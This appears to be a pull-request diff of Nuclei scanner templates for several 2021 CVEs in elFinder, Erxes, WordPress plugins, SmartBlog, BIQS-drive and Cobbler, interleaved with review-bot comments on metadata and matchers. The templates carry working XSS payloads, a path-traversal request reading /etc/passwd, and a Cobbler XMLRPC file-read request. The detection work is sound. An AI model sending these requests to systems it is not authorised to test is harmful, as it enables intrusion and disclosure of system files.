- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
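Review bot: The template's only matcher is the `Location` regex, with no `matchers-condition` or status check, whereas the sibling open-redirect template CVE-2021-24838 pairs the identical regex with `status: 302`; adding the same status matcher (and `matchers-condition: and`) here keeps the two templates consistent and rules out a 200 page that happens to carry a Location-like header. The description is a long quote of the advisory; a one-line summary of the weakness followed by the quoted example would be easier to scan in output.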
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-32682
|
||||
|
||||
info:
|
||||
name: elFinder - Multiple vulnerabilities leading to RCE
|
||||
author: smaranchand
|
||||
severity: critical
|
||||
tags: cve,cve2021,elfinder,misconfig,rce,oss
|
||||
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
|
||||
reference:
|
||||
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
|
||||
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
|
||||
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
|
||||
remediation: Update to elFinder 2.1.59
|
||||
metadata:
|
||||
github: https://github.com/Studio-42/elFinder
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-32682
|
||||
cwe-id: CWE-22,CWE-78,CWE-918
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
|
||||
- "{{BaseURL}}/assets/elFinder/elfinder.html"
|
||||
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
|
||||
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "elfinder"
|
||||
- "php/connector"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
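Review bot: The matchers only require the strings `elfinder` and `php/connector` in a 200 page, i.e. they establish that an elFinder UI is reachable, not that it is the affected 2.1.58 release the description names; installations already on the patched 2.1.59 will therefore be reported as a critical CVE. Either add a version check (the UI page or its bundled JS may carry one — to be verified against a known-good install) or name the template for what it tests, an exposed elFinder page, and keep the CVE as a reference in the description. The ordering `tags:` before `description:` also differs from the other templates in the commit.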
@ -0,0 +1,36 @@
|
|||
id: CVE-2021-32853
|
||||
|
||||
info:
|
||||
name: Erxes <= v0.23.0 XSS
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
|
||||
metadata:
|
||||
shodan-query: http.title:"erxes"
|
||||
tags: cve,cve2021,xss,erxes,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'topic_id: "</script><script>alert(document.domain)</script>'
|
||||
- "window.erxesEnv"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
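Review bot: The NVD reference `https://nvd.nist.gov/vuln/detail/CVE-2021-3285` is missing the last digit of the id and should be `https://nvd.nist.gov/vuln/detail/CVE-2021-32853`. The name says `<= v0.23.0` while the description says `prior to version 0.23.0`; the two bounds disagree, so one needs correcting against the advisory. This is also the only template in the commit without a `classification:` block (at least `cve-id: CVE-2021-32853` and `cwe-id: CWE-79`), and `cross-site scripting.The value` needs a space after the full stop.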
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-34640
|
||||
|
||||
info:
|
||||
name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-34640
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-34640
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET //wp-admin/options-general.php/"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
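Review bot: The request line begins with a double slash, `GET //wp-admin/options-general.php/...`, while the otherwise identical request in CVE-2021-34643 uses a single `/wp-admin/...`; if the leading `//` is deliberate for the `$_SERVER['PHP_SELF']` reflection the description mentions, a comment above the request saying so would stop it being "fixed", otherwise it should be `GET /wp-admin/options-general.php/...`. The path also mixes a literal `</script>` with an encoded `/script%3E` fragment, which is hard to follow without a comment explaining which part is expected to be reflected.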
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-34643
|
||||
|
||||
info:
|
||||
name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-34643
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -4,8 +4,9 @@ info:
|
|||
name: PrestaShop SmartBlog SQL Injection
|
||||
author: whoever
|
||||
severity: critical
|
||||
description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
|
||||
description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.
|
||||
tags: cve,cve2021,prestashop,smartblog,sqli
|
||||
remediation: Apply the fix.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
|
||||
- https://blog.sorcery.ie/posts/smartblog_sqli/
|
||||
|
@ -30,3 +31,5 @@ requests:
|
|||
words:
|
||||
- "c5fe25896e49ddfe996db7508cf00534"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
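Review bot: The new description reads `is vulnerable to a SQL injection vulnerability`, which is redundant; the previous `is vulnerable to a SQL injection in the blog archive functionality` or `contains a SQL injection vulnerability in the blog archive functionality` reads better. `remediation: Apply the fix.` does not tell an operator what to do; since the description gives the `< 4.0.6` bound, `remediation: Update SmartBlog to 4.0.6 or later.` (version to be confirmed against the advisory) is more useful. The `info:` block continues outside the hunk.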
@ -13,7 +13,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-38314
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-39322
|
||||
|
||||
info:
|
||||
name: Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-39322
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
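Review bot: The `tags` line omits `xss` even though the template is classified `cwe-id: CWE-79` and its name says Reflected Cross-Site Scripting; the sibling CVE-2021-39350 template in this diff does tag `xss`, so for consistent filtering use `tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated`. The same omission is visible in the CVE-2021-34643 template earlier in the diff. Minor: the body matcher string is single-quoted here while the other templates double-quote the identical string; pick one style across the set.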
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-39350
|
||||
|
||||
info:
|
||||
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-39350
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
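Review bot: The `name` field carries no affected-version range, unlike the other new templates in this diff ("Easy Social Icons < 3.0.9 - ..."); the description states 7.5.0.727 - 7.5.2.727, so `name: FV Flowplayer Video Player 7.5.0.727 - 7.5.2.727 - Authenticated Reflected XSS` would make the index entry self-describing. Minor: the header word `text/html` is unquoted here while the sibling templates quote it; it parses as a string either way, but a consistent style keeps diffs clean.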
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-39433
|
||||
|
||||
info:
|
||||
name: BIQS IT Biqs-drive v1.83 LFI
|
||||
author: Veshraj
|
||||
severity: high
|
||||
description: A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
|
||||
reference:
|
||||
- https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
|
||||
tags: lfi,biqsdrive,cve,cve2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-39433
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
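Review bot: The `classification` block has no `cwe-id`, while every other new template in this diff carries one; take the value from the NVD record for this CVE (a path-traversal file read like this one is normally CWE-22, but confirm against the entry before adding it). The description's opening "exists in version BIQS IT Biqs-drive v1.83 and below" is awkward — "exists in BIQS IT Biqs-drive v1.83 and below" reads cleanly. Also `tags` is placed before `classification` here whereas the other templates put it after; key order is not semantic, but a consistent layout makes the set easier to review.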
|
|
@ -0,0 +1,95 @@
|
|||
id: CVE-2021-40323
|
||||
|
||||
info:
|
||||
name: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method
|
||||
severity: critical
|
||||
author: c-sh0
|
||||
reference:
|
||||
- https://github.com/cobbler/cobbler/issues/2795
|
||||
- https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-40323
|
||||
cwe-id: CWE-94
|
||||
tags: cve,cve2021,cobbler,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version='1.0'?>
|
||||
<methodCall>
|
||||
<methodName>find_profile</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<struct>
|
||||
<member>
|
||||
<name>name</name>
|
||||
<value>
|
||||
<string>*</string>
|
||||
</value>
|
||||
</member>
|
||||
</struct>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
- |
|
||||
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version='1.0'?>
|
||||
<methodCall>
|
||||
<methodName>generate_script</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<string>{{profile}}</string>
|
||||
</value>
|
||||
</param>
|
||||
<param>
|
||||
<value>
|
||||
<string></string>
|
||||
</value>
|
||||
</param>
|
||||
<param>
|
||||
<value>
|
||||
<string>/etc/passwd</string>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: profile
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<value><string>(.*?)</string></value>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/xml'
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0"
|
||||
- "bin:.*:1"
|
||||
- "nobody:.*:99"
|
||||
condition: or
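Review bot: The `name` field is the full NVD sentence rather than the "Product version - Issue" form the other templates in this diff use; `name: Cobbler < 3.3.0 - Log Poisoning / Remote Code Execution via XMLRPC` would match that convention. A `remediation` field is also missing although the fix version is already stated in the name, e.g. `remediation: Upgrade to Cobbler 3.3.0 or later.` One reliability note, inferred rather than verified: the `profile` extractor takes the first `<value><string>` anywhere in the first response, which is only the profile name if that member happens to be serialized first; anchoring the regex on the preceding `<name>name</name>` member would avoid a false negative when another string-valued field comes first.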
|